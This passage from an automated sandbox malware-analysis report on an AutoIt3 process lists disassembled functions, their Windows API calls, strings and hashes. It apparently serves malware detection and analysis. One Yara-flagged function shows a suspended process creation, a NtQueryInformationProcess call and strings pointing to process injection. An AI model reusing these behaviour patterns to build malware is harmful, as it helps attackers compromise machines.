                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 91350ec390c2997749c087be2e90d5edb492281144e8ab15eddbafb90197296f
                                      • Instruction ID: 3852bf923d444270106bf3d1056b670773732fab52c65e6d3e2ae78afd5b00ad
                                      • Opcode Fuzzy Hash: 91350ec390c2997749c087be2e90d5edb492281144e8ab15eddbafb90197296f
                                      • Instruction Fuzzy Hash: 1121AF32604118BFDB129F54CC85EAF37BAFB89764F618124FA04DB290C671EC51ABA0
                                      Function 00887D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00887D97
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00887DAC
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00887DB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: fdbdbe26cc172652cb82f83e6040ff7bf4fc1555564df0dd7857798db534b05d
                                      • Instruction ID: 3452087f9fd5ae1a37b5afcddda15cb5937be9e2b3fed23f6560c18fba94cc6b
                                      • Opcode Fuzzy Hash: fdbdbe26cc172652cb82f83e6040ff7bf4fc1555564df0dd7857798db534b05d
                                      • Instruction Fuzzy Hash: 0811E372244208BEDF20AF64CC05FEB3BA9FF89B54F214518FB45E61A0D671E811DB20
                                      Function 00814BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00814AF7,?), ref: 00814BB8
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814BCA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 5fd4489c16c51f00d19aee89bb22f8116da582acd6ccd4c84cbd8e3cc127843a
                                      • Instruction ID: 3b35408c49ae0248f596e78fba705d6ab9dfe778c10186d0d29f75aea7791a91
                                      • Opcode Fuzzy Hash: 5fd4489c16c51f00d19aee89bb22f8116da582acd6ccd4c84cbd8e3cc127843a
                                      • Instruction Fuzzy Hash: FCD017705197128FD720AFB1EC08B8676E9FF04365B19AC6AD4A6D6664EA74D8C0CA10
                                      Function 00814B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00814B44,?,008149D4,?,?,008127AF,?,00000001), ref: 00814B85
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814B97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 08b55628fd428c084041d83574bffb194b4077c63c1f74685fc95484b110d0c3
                                      • Instruction ID: f81f31f00c49f4d8bddfb5fd52b7ecb3e73b9ad53c4369cae57978bb32a6dc1a
                                      • Opcode Fuzzy Hash: 08b55628fd428c084041d83574bffb194b4077c63c1f74685fc95484b110d0c3
                                      • Instruction Fuzzy Hash: F4D012705147128FD7206FB1DC1874676D8FF04351F15982AD4A5D2650D6B4D4C0CA14
                                      Function 00881447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00881696), ref: 00881455
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00881467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 220de269be8d37bbe57e552e9079888d6581f579c82c36ce4938afa5b9cd4837
                                      • Instruction ID: 77fd57551850d60f8bfab42306ab143854e26662f714912f7f318fc354e4d773
                                      • Opcode Fuzzy Hash: 220de269be8d37bbe57e552e9079888d6581f579c82c36ce4938afa5b9cd4837
                                      • Instruction Fuzzy Hash: 84D017305107128FDB20AF75D80864676E9FF06395B15CC2A94E6E2660EB74D8C0CB24
                                      Function 008155F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00815E3D), ref: 008155FE
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00815610
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 733145756e3918cbb7582a20b8cfbc1ce068fe558fc734961f9204885d2dee00
                                      • Instruction ID: 6e5e799ded6a6a59e105583ac045e7f20aeb5cd2ed2c6035ce35f3be5eb2d0df
                                      • Opcode Fuzzy Hash: 733145756e3918cbb7582a20b8cfbc1ce068fe558fc734961f9204885d2dee00
                                      • Instruction Fuzzy Hash: C0D01275510712CFD7206FB1DC486567AD8FF54355F19882AD4A5D2251D774C4C0CE90
                                      Function 008797CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008793DE,?,00890980), ref: 008797D8
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008797EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 0cdb07041ffbc02f2ac2eacb3a635b15d8e62e5f40d43e7e080d6859d74c809c
                                      • Instruction ID: 8ebe9a25c3f2a0550184097d0584d80a02f948f73d35b881083885ed111fe397
                                      • Opcode Fuzzy Hash: 0cdb07041ffbc02f2ac2eacb3a635b15d8e62e5f40d43e7e080d6859d74c809c
                                      • Instruction Fuzzy Hash: 8BD01270510713CFD720AF71D88864676D5FF04391B15C82AD4E9D2250DB74C480CA11
                                      Function 00857D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52fbecbcccca18550663c1d95f22bec3f432e23142b1959c87cd26fef6e51650
                                      • Instruction ID: b4456e2c992814f88fa611e415c4d6c0093fe4a6015b5545ddec700e7beaab0b
                                      • Opcode Fuzzy Hash: 52fbecbcccca18550663c1d95f22bec3f432e23142b1959c87cd26fef6e51650
                                      • Instruction Fuzzy Hash: 21C18F75A0021AEFCB14CF98C884EAEB7B5FF48715B108599EC05EB251DB31ED89CB90
                                      Function 0087E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 0087E7A7
                                      • CharLowerBuffW.USER32(?,?), ref: 0087E7EA
                                        • Part of subcall function 0087DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087DEAE
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0087E9EA
                                      • _memmove.LIBCMT ref: 0087E9FD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: 2b3dc6c7782bb30b8b28e370958fd035974b21310ccb3084b0c7e0c5aa33460b
                                      • Instruction ID: 1881acd2ed61c6e351fdc268c92c0c6a01c9a9a88d9c72e046d4597d01624e77
                                      • Opcode Fuzzy Hash: 2b3dc6c7782bb30b8b28e370958fd035974b21310ccb3084b0c7e0c5aa33460b
                                      • Instruction Fuzzy Hash: A9C14771A083119FC754DF28C48096ABBE4FF89714F0489AEF999DB351D731E945CB82
                                      Function 0087877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 008787AD
                                      • CoUninitialize.OLE32 ref: 008787B8
                                        • Part of subcall function 0088DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00878A0E,?,00000000), ref: 0088DF71
                                      • VariantInit.OLEAUT32(?), ref: 008787C3
                                      • VariantClear.OLEAUT32(?), ref: 00878A94
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 69e78c54fa2648c46150af5fb27545b3662fc6700e5ccb1a15f31e1618461750
                                      • Instruction ID: f4eb6fb625f47d7e6fb3c9b76a14d253aefabff2a835cd397655068607f50bc6
                                      • Opcode Fuzzy Hash: 69e78c54fa2648c46150af5fb27545b3662fc6700e5ccb1a15f31e1618461750
                                      • Instruction Fuzzy Hash: 68A10475644A119FD750EF18C885A2AB7E4FF88354F148859FA99DB3A1CB30ED40CB92
                                      Function 0085814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                      Download Yara Rule
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858308
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858320
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00890988,000000FF,?,00000000,00000800,00000000,?,00893C4C,?), ref: 00858345
                                      • _memcmp.LIBCMT ref: 00858366
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: fa74da81b0348dfb30fbebe1318f0e15af279d6129a04da344c8d213a95f93c4
                                      • Instruction ID: c957077c43cb69e478b879ac7a9ad61db33128b08672c6dcf1238da9cb5e509d
                                      • Opcode Fuzzy Hash: fa74da81b0348dfb30fbebe1318f0e15af279d6129a04da344c8d213a95f93c4
                                      • Instruction Fuzzy Hash: 3E810971A00109EFCB04DF94C888EEEBBB9FF89316F144559E515EB250DB71AE09CB60
                                      Function 0085749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 463925f6669f608a4c026d3c426a54f01ba7e1b07f8bff3278e8350cfc370696
                                      • Instruction ID: 65bf212629f45b81f0a79d1d0a3d2450a9cdf6427e917c074185a7004bc7e318
                                      • Opcode Fuzzy Hash: 463925f6669f608a4c026d3c426a54f01ba7e1b07f8bff3278e8350cfc370696
                                      • Instruction Fuzzy Hash: F651BA706087059BDB209F7DEC95A2DB7E9FF54315B20D81FE946C72D2EB3098888B16
                                      Function 0087F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0087F526
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0087F534
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0087F5F4
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0087F603
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 928e08bc9fd6aaf0cf94ee1176c45ed9c3a6d731ec180adb8aec722aa7c90aba
                                      • Instruction ID: 54c54e02fc3be5aa60dd05b30a50236c00ca943bfa2b411255b235d92ac1e1c4
                                      • Opcode Fuzzy Hash: 928e08bc9fd6aaf0cf94ee1176c45ed9c3a6d731ec180adb8aec722aa7c90aba
                                      • Instruction Fuzzy Hash: ED514AB11043119FD710EF28DC86AABB7E8FF94740F00492DF695D62A2EB709904CB92
                                      Function 00889E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(00EAF0A0,?), ref: 00889E88
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00889EBB
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00889F28
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: 8d7e006e2fe2b8171ead72dd850556ed8b6e1634743f2dbc1d2379b56c082b6f
                                      • Instruction ID: 383cd27e0e5d708872414d7e1e37ef5ad1f0a71943bd05de477d5459afeb447a
                                      • Opcode Fuzzy Hash: 8d7e006e2fe2b8171ead72dd850556ed8b6e1634743f2dbc1d2379b56c082b6f
                                      • Instruction Fuzzy Hash: 41513D30A00209AFCB24EF58C884DBE7BB6FB54320F148269F965D72A0DB70AD41CF90
                                      Function 0082492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                      • Instruction ID: a42768e06b73433cd0ab9ced469a903061f55863ef69c098e866d252ac5f52d5
                                      • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                      • Instruction Fuzzy Hash: 5441B33160173AABDF28CF69E8809AF7BA5FF40364B24913DE856C7650DB719DC08B64
                                      Function 03CF0148 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 135sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00001388,00000000,03CF02F1,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03CF01C3
                                        • Part of subcall function 03CEC8D4: GetCurrentProcessId.KERNEL32(?,00000000,03CECBE5), ref: 03CEC954
                                        • Part of subcall function 03CECBF4: GetCurrentProcessId.KERNEL32(?,00000000,03CECE48,?,00000000), ref: 03CECC6A
                                        • Part of subcall function 03CECBF4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,03CECE48,?,00000000), ref: 03CECD37
                                        • Part of subcall function 03CECBF4: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 03CECD4F
                                        • Part of subcall function 03CEFEF0: CloseHandle.KERNEL32(?), ref: 03CF00AF
                                        • Part of subcall function 03CF82D8: GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,03CF5166,?,03CEA59B,00000000,03CEA5FE,?,00000000,00000000,00000000,00000000,00000000), ref: 03CF831A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Current$AttributesCloseCreateFileHandleInformationQuerySleep
                                      • String ID: c:\debugg$get random pid $lp.txt
                                      • API String ID: 761091095-3996086189
                                      • Opcode ID: 8107c8bdddadc2e8124c81629cc77a3f1b33082a70b64b0cdd6f36e86180c9b9
                                      • Instruction ID: a7addb15e8d998d01d1c474764a2aca78f8416a3954547e9d7681b7bab3bfc0d
                                      • Opcode Fuzzy Hash: 8107c8bdddadc2e8124c81629cc77a3f1b33082a70b64b0cdd6f36e86180c9b9
                                      • Instruction Fuzzy Hash: 2841A579A003598FDBA1FBA4C941AAF7369BF55640B178065EA00EF352CB30EE05E771
                                      Function 0085A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0085A68A
                                      • __itow.LIBCMT ref: 0085A6BB
                                        • Part of subcall function 0085A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0085A976
                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0085A724
                                      • __itow.LIBCMT ref: 0085A77B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: ca08e3d3bd16fc4ae18b6a672ace63ce445d22e29740f3f2454dd52ebf811378
                                      • Instruction ID: 2ce0ac60b095defb7582d4ff5ab4a5957c8e5f29d0f72d1ebe9447b3dab6c967
                                      • Opcode Fuzzy Hash: ca08e3d3bd16fc4ae18b6a672ace63ce445d22e29740f3f2454dd52ebf811378
                                      • Instruction Fuzzy Hash: CE417374A00209ABDF15EF54C899BEE7BB9FF58751F040059FD15E3281DB709A88CAA3
